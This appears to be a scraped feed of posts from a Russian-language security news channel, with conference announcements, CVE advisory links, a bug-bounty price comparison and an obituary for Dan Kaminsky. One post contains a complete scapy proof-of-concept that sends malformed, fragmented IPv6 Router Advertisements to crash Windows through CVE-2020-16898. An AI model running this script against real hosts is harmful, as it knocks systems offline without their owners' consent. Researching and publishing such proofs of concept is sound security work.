DEF CON Safe Mode online! 📺👻
https://www.youtube.com/watch?v=aLe-xW-Ws4c&list=PL9fPq3eQfaaBk9DFnyJRpxPi8Lz1n7cFv
https://www.youtube.com/watch?v=aLe-xW-Ws4c&list=PL9fPq3eQfaaBk9DFnyJRpxPi8Lz1n7cFv
YouTube
DEF CON Safe Mode - Christopher Wade - Beyond Root
Rooting a smartphone is often considered the ultimate method to allow a user to take complete control of their device. Despite this, many smartphones contain hardware which is closed off to any modification. This talk aims to show how this hardware can be…
Уже через 5 минут начнется конференция r2con 2020 в онлайн формате, посвященная различным темам, связанным тем или иным образом с reverse engineering.
Отдельно хотелось бы отметить доклады Codename: flip.re, From hardware to zero-day от Olivia, Semi-automatic Code Deobfuscation, ESIL side-channel simulation и конечно же серию докладов по новым фичам, созданных в рамках GSoC 2020, под руководством гостя одного из выпусков нашего подкаста - Xvilka.
Стрим: https://www.youtube.com/channel/UCZo6gyBPj6Vgg8u2dfIhY4Q
Расписание: https://rada.re/con/2020/assets/r2con2020schedule.pdf
Сайт: https://rada.re/con/2020/
Отдельно хотелось бы отметить доклады Codename: flip.re, From hardware to zero-day от Olivia, Semi-automatic Code Deobfuscation, ESIL side-channel simulation и конечно же серию докладов по новым фичам, созданных в рамках GSoC 2020, под руководством гостя одного из выпусков нашего подкаста - Xvilka.
Стрим: https://www.youtube.com/channel/UCZo6gyBPj6Vgg8u2dfIhY4Q
Расписание: https://rada.re/con/2020/assets/r2con2020schedule.pdf
Сайт: https://rada.re/con/2020/
YouTube
radareorg
Your favourite conference around the tool radare2
Forwarded from Silicon Pravda
Собирали $60k, а вышло $5M. Хакеры на Kickstarter https://youtu.be/gp3W8cL_nKc
YouTube
Интервью с Flipper Zero: тамагочи для хакеров: который собрал $5M на KickStarter
Всем здравствуйте! Это Силиконовая правда. Меня зовут Иван. Я предприниматель. Живу в Кремниевой Долине. Этот блог про долину, бизнес, предпринимательство, запуск бизнеса в США и всё такое.
Группа YCombinator in Russian в Facebook, где выпускники YC помогают…
Группа YCombinator in Russian в Facebook, где выпускники YC помогают…
Forwarded from . .
YouTube
📜ИСТОРИЯ СОЗДАНИЯ И РАЗВИТИЯ ПРОГРАММЫ Intercepter-NG | СОФТ | РАЗРАБОТКА📗
Как все начиналось, через какие этапы проходила разработка Intercepter'а, рассказываю и показываю!
Twitter: https://twitter.com/IntercepterNG
Telegram канал: https://t.iss.one/cepter
Telegram чат: https://t.iss.one/cepter_chat
Music: Dubsane - Sand Dunes
#история…
Twitter: https://twitter.com/IntercepterNG
Telegram канал: https://t.iss.one/cepter
Telegram чат: https://t.iss.one/cepter_chat
Music: Dubsane - Sand Dunes
#история…
CVE-2020-16898 – Exploiting RCE "Bad Neighbor" vulnerability
https://blog.quarkslab.com/beware-the-bad-neighbor-analysis-and-poc-of-the-windows-ipv6-router-advertisement-vulnerability-cve-2020-16898.html
https://blog.pi3.com.pl/?p=780
BSOD exploit for CVE-2020-16898 - Windows TCP/IP Remote Code Execution Vulnerability
https://blog.quarkslab.com/beware-the-bad-neighbor-analysis-and-poc-of-the-windows-ipv6-router-advertisement-vulnerability-cve-2020-16898.html
https://blog.pi3.com.pl/?p=780
BSOD exploit for CVE-2020-16898 - Windows TCP/IP Remote Code Execution Vulnerability
from scapy.all import *
v6_dst = "fd12:db80:b052:0:7ca6:e06e:acc1:481b"
v6_src = "fe80::24f5:a2ff:fe30:8890"
p_test_half = 'A'.encode()*8 + b"\x18\x30" + b"\xFF\x18"
p_test = p_test_half + 'A'.encode()*4
c = ICMPv6NDOptEFA();
e = ICMPv6NDOptRDNSS()
e.len = 21
e.dns = [
"AAAA:AAAA:AAAA:AAAA:FFFF:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]
pkt = ICMPv6ND_RA() / ICMPv6NDOptRDNSS(len=8) / \
Raw(load='A'.encode()*16*2 + p_test_half + b"\x18\xa0"*6) / c / e / c / e / c / e / c / e / c / e / e / e / e / e / e / e
p_test_frag = IPv6(dst=v6_dst, src=v6_src, hlim=255)/ \
IPv6ExtHdrFragment()/pkt
l=fragment6(p_test_frag, 200)
for p in l:
send(p)
Quarkslab
Beware the Bad Neighbor: Analysis and PoC of the Windows IPv6 Router Advertisement Vulnerability (CVE-2020-16898) - Quarkslab's…
This blog post analyzes the vulnerability known as "Bad Neighbor" or CVE-2020-16898, a stack-based buffer overflow in the IPv6 stack of Windows, which can be remotely triggered by means of a malformed Router Advertisement packet.
Найдено несколько уязвимостей в Jitsi Meet:
- Arbitrary Client Remote Code Execution (CVE-2020-27162)
- Limited Certificate Validation Bypass (CVE-2020-27161)
https://research.nccgroup.com/2020/10/23/technical-advisory-jitsi-meet-electron-arbitrary-client-remote-code-execution-cve-2020-27162/
- Arbitrary Client Remote Code Execution (CVE-2020-27162)
- Limited Certificate Validation Bypass (CVE-2020-27161)
https://research.nccgroup.com/2020/10/23/technical-advisory-jitsi-meet-electron-arbitrary-client-remote-code-execution-cve-2020-27162/
EoP 0-day exploited in the wild: Windows Kernel Cryptography Driver cng.sys pool-based buffer overflow in IOCTL 0x390400
PoC: https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=472684
Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=2104
PoC: https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=472684
Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=2104
Стали доступны слайды с прошедшей конференции Black Hat Europe 2020 https://www.blackhat.com/eu-20/briefings/schedule/
Blackhat
Black Hat Europe 2020
Видео докладов с Black Hat US 2020 доступны для просмотра онлайн! 🔥
https://www.youtube.com/playlist?list=PLH15HpR5qRsXE_4kOSy_SXwFkFQre4AV_
https://www.youtube.com/playlist?list=PLH15HpR5qRsXE_4kOSy_SXwFkFQre4AV_
CFP на юбилейную ZeroNights 2021 открыта! https://01x.cfp.zeronights.ru/zn2021/
01x.cfp.zeronights.ru
ZeroNights 2021
Schedule, talks and talk submissions for ZeroNights 2021
Forwarded from ZeroNights
ZeroNights в поисках лучших докладов!
Мы ищем практиков и исследователей ИБ, готовых поделиться результатами своей работы в самых разных областях.
На ZeroNights 2021 вы можете выступить с 15-, 30- и 45-минутным докладом. А если представите эксклюзивное 45-минутное исследование в области Offensive Security, то получите денежное вознаграждение.
Подать заявку можно на сайте.
Мы ищем практиков и исследователей ИБ, готовых поделиться результатами своей работы в самых разных областях.
На ZeroNights 2021 вы можете выступить с 15-, 30- и 45-минутным докладом. А если представите эксклюзивное 45-минутное исследование в области Offensive Security, то получите денежное вознаграждение.
Подать заявку можно на сайте.
Проблема выбора 🤔🤑
Zerodium $250k за Exchange RCE
https://zerodium.com/program.html
Microsoft $0 ... $15k? ... $20k?
https://www.microsoft.com/en-us/msrc/bounty
Zerodium $250k за Exchange RCE
https://zerodium.com/program.html
Microsoft $0 ... $15k? ... $20k?
https://www.microsoft.com/en-us/msrc/bounty
Интересен был бы регулярный голосовой чат на нашем канале?
Final Results
53%
звучит интригующе 🍿
47%
что за дичь, в топку 🤦♂️
Интервью с Alisa Esage Шевченко
https://youtu.be/dA3aIMgRFY8
https://youtu.be/dA3aIMgRFY8
YouTube
Pwn2Own 2021 - Day One Live Stream
Join us for Pwn2Own 2021! This year, we are hosting the event in Austin, Toronto, and virtually with participants from around the globe. We kick everything off with a random drawing to see the order of attempts for the contest. The schedule is on the blog…
Forwarded from ZeroNights
Известны первые утвержденные доклады ZN 2021! Рассказываем о тех, которые войдут в основную программу.
1. Эксплуатация checkm8 с неизвестным SecureROM на примере чипа T2
Алексей Коврижных покажет продвинутый способ дампинга прошивки, который будет работать на устройствах с WXN, на примере T2.
2. LPE в Ring -3 / Intel ME
Дмитрий Турченков раскроет тайны эксплуатации багов в системном компоненте ME через механизм IPC.
3. Hacking KaiOS
Алексей Россовский расскажет о возможных векторах атак на KaiOS, включая сценарии удаленного выполнения кода, повышения привилегий и изучения новых уязвимостей.
Читать подробнее о докладах
1. Эксплуатация checkm8 с неизвестным SecureROM на примере чипа T2
Алексей Коврижных покажет продвинутый способ дампинга прошивки, который будет работать на устройствах с WXN, на примере T2.
2. LPE в Ring -3 / Intel ME
Дмитрий Турченков раскроет тайны эксплуатации багов в системном компоненте ME через механизм IPC.
3. Hacking KaiOS
Алексей Россовский расскажет о возможных векторах атак на KaiOS, включая сценарии удаленного выполнения кода, повышения привилегий и изучения новых уязвимостей.
Читать подробнее о докладах
Forwarded from ZeroNights
Юбилейные события отправляют нас к истокам. Когда-то в истории ZeroNights воркшопы были традиционными активностями, так почему бы нам не вернуть эту традицию и не включить их в программу?
Мы принимаем заявки на проведение практических воркшопов, где вы сможете поделиться своми идеями и наработками!
Подать заявку и задать вопросы по проведению вы можете по почте
В письме укажите время продолжительности планируемого вами воркшопа и минимальные требования к месту проведения.
Мы принимаем заявки на проведение практических воркшопов, где вы сможете поделиться своми идеями и наработками!
Подать заявку и задать вопросы по проведению вы можете по почте
[email protected]. В письме укажите время продолжительности планируемого вами воркшопа и минимальные требования к месту проведения.
В возрасте 42-х лет ушел из жизни Dan Kaminsky, известный ресечер продемонстрировавший миру уязвимости в DNS и сети Интернет в целом. Твои исследования останутся в нашей памяти навсегда.
R.I.P. my friend!
R.I.P. my friend!